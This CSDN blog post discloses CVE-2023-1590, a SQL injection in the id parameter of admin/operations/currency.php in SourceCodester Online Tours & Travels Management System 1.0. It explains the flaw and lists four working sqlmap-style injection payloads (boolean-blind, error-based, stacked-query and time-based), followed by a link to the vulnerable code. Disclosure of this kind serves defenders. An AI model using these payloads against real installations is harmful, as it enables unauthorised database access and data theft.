Headline
CVE-2023-1590: SourceCodester Online Tours & Travels Management System currency.php sql injection_@sec的博客-CSDN博客
A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0 and classified as critical. This issue affects the function exec of the file admin/operations/currency.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223655.
@sec 于 2023-03-23 14:29:04 发布 14 收藏
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
SourceCodester Online Tours & Travels Management System currency.php sql injection
Url: admin/operations/currency.php
Abstract:
Line 44 of currency.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
Data enters a program from an untrusted source.
The data is used to dynamically construct a SQL query.
In this case, the data is passed to exec() in currency.php on line 44.
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: id=111' AND 9192=(SELECT (CASE WHEN (9192=9192) THEN 9192 ELSE (SELECT 7773 UNION SELECT 6688) END))-- -
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=111' AND GTID_SUBSET(CONCAT(0x7171767671,(SELECT (ELT(7846=7846,1))),0x71767a7671),7846)-- FmDU
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=111';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
Payload: id=111' AND 8032=BENCHMARK(5000000,MD5(0x54465361))-- fyPR
Download Code:
https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html